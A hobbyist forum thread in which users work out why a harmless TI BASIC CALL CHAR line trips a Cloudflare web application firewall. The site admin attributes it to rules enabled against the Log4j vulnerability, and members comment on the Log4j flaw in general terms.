+Schmitzi Posted December 12, 2021 Share Posted December 12, 2021 Hi, from time to time I read comments here that say, that the users local scanner or firewall complains about a virus. IIRC, this happens while using emulators... Today I found a TiBasic program (Waterrun from Michael Silberberg) that triggers the AtariAge firewall (or something at their providers server construct) And it does not matter if you try to post that text here as plain text, as .TXT-file, or as spoiler. You´ll get the following message: This seems no problem at all, as I triggered the firewall more than 20 times now with snippets/fragments of the basic code, to find out if a special text line is the cluprit. And I have no other problems afterwards, all seems OK. And so it is: You can find the TiBasic file inside this ZIP (posting this is OK), and if you just paste LINE 370 or 380 whereever here around in a post or a message into AA, you will get the error message Waterrun.zip PS: This is the text, as picture, which seems to look like a virus´ or intruders´ signature: Quote Link to comment Share on other sites More sharing options...
+Schmitzi Posted December 12, 2021 Author Share Posted December 12, 2021 TEST: (155,"FF818181818181FF") Quote Link to comment Share on other sites More sharing options...
+Schmitzi Posted December 12, 2021 Author Share Posted December 12, 2021 So this part of the text seems to be the problem in granular: Just change the x into a H (to make it CALL CHAR again), and you´ll get the block: CxAR(155,"FF818181818181FF") 1 Quote Link to comment Share on other sites More sharing options...
+9640News Posted December 12, 2021 Share Posted December 12, 2021 1 hour ago, Schmitzi said: So this part of the text seems to be the problem in granular: Just change the x into a H (to make it CALL CHAR again), and you´ll get the block: CHAR(155,"FF818181818181FF") 1 Quote Link to comment Share on other sites More sharing options...
+Schmitzi Posted December 12, 2021 Author Share Posted December 12, 2021 28 minutes ago, 9640News said: CHAR(155,"FF818181818181FF") Quote Link to comment Share on other sites More sharing options...
+Schmitzi Posted December 12, 2021 Author Share Posted December 12, 2021 Strange. This qoutings worked, but when I freshly insert 1 line here, it still is blocked... CHAR(155,"FF818181818181FF") CHAR(155,"FF818181818181FF") Quote Link to comment Share on other sites More sharing options...
+arcadeshopper Posted December 12, 2021 Share Posted December 12, 2021 Hi, from time to time I read comments here that say, that the users local scanner or firewall complains about a virus. IIRC, this happens while using emulators... Today I found a TiBasic program (Waterrun from Michael Silberberg) that triggers the AtariAge firewall (or something at their providers server construct) And it does not matter if you try to post that text here as plain text, as .TXT-file, or as spoiler. You´ll get the following message: This seems no problem at all, as I triggered the firewall more than 20 times now with snippets/fragments of the basic code, to find out if a special text line is the cluprit. And I have no other problems afterwards, all seems OK. And so it is: You can find the TiBasic file inside this ZIP (posting this is OK), and if you just paste LINE 370 or 380 whereever here around in a post or a message into AA, you will get the error message Waterrun.zip PS: This is the text, as picture, which seems to look like a virus´ or intruders´ signature: @Albert Sent from my Pixel 6 Pro using Tapatalk Quote Link to comment Share on other sites More sharing options...
HOME AUTOMATION Posted December 12, 2021 Share Posted December 12, 2021 3 hours ago, Schmitzi said: Strange. This qoutings worked, but when I freshly insert 1 line here, it still is blocked... CHAR(155,"FF818181818181FF") CHAR(155,"FF818181818181FF") Keep this up, and you'll eventually crack the code... ...Than we'll all be in trouble! 1 2 Quote Link to comment Share on other sites More sharing options...
+Schmitzi Posted December 12, 2021 Author Share Posted December 12, 2021 1 hour ago, arcadeshopper said: @Albert Sent from my Pixel 6 Pro using Tapatalk yes, i´ve sent a message to him same time. But it wasn´t easy to send the code ? 1 Quote Link to comment Share on other sites More sharing options...
+Schmitzi Posted December 12, 2021 Author Share Posted December 12, 2021 5 hours ago, 9640News said: yep, I think qouting seems to work because this is not seen as an external "upload" to the system. Quote Link to comment Share on other sites More sharing options...
HOME AUTOMATION Posted December 12, 2021 Share Posted December 12, 2021 Sooo ...why did HAR turn red! P.S. ...not joking this time. 1 Quote Link to comment Share on other sites More sharing options...
Albert Posted December 12, 2021 Share Posted December 12, 2021 This is pretty interesting. Yesterday I enabled Cloudflare's "Web Application Firewall" (WAF) to mitigate the new log4j exploit that's out in the wild. This also looks for other known exploits, and I'm guessing that particular character sequence triggered the WAF. Yep, I just looked and found why it was blocked: I've disabled this rule, so should be fine now. Until you hit some other rule. ..Al 4 Quote Link to comment Share on other sites More sharing options...
+OLD CS1 Posted December 12, 2021 Share Posted December 12, 2021 8 hours ago, Schmitzi said: So this part of the text seems to be the problem in granular: Just change the x into a H (to make it CALL CHAR again), and you´ll get the block: CxAR(155,"FF818181818181FF") CHAR is a SQL type. Like the error note, the CloudFlare firewall also protects against SQL injections, so my guess it is thinks you are trying to send a SQL script and defining a type. EDIT: Yeah, what he said. 3 Quote Link to comment Share on other sites More sharing options...
+mizapf Posted December 12, 2021 Share Posted December 12, 2021 I just read about it; that Log4j bug leads to a rather nasty 0-day exploit. Anyone who is using Log4j version 2 should be alerted! See also https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/ Why on Earth should one add a parameter expansion / evaluation feature to the write method of a logging framework?! This is seriously crazy. 2 Quote Link to comment Share on other sites More sharing options...
+TheBF Posted December 15, 2021 Share Posted December 15, 2021 On 12/12/2021 at 2:51 PM, mizapf said: Why on Earth should one add a parameter expansion / evaluation feature to the write method of a logging framework?! This is seriously crazy. Because they could... Common sense ain't so common. 1 1 Quote Link to comment Share on other sites More sharing options...
Asmusr Posted December 15, 2021 Share Posted December 15, 2021 On 12/12/2021 at 8:51 PM, mizapf said: Why on Earth should one add a parameter expansion / evaluation feature to the write method of a logging framework?! This is seriously crazy. I assume it was added to be able to log information about the user that you would get from ldap into the access log instead of just the user's id. The real issue is the lack of escaping, which allows an outsider to inject these evaluated expressions via the user-agent string. 3 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.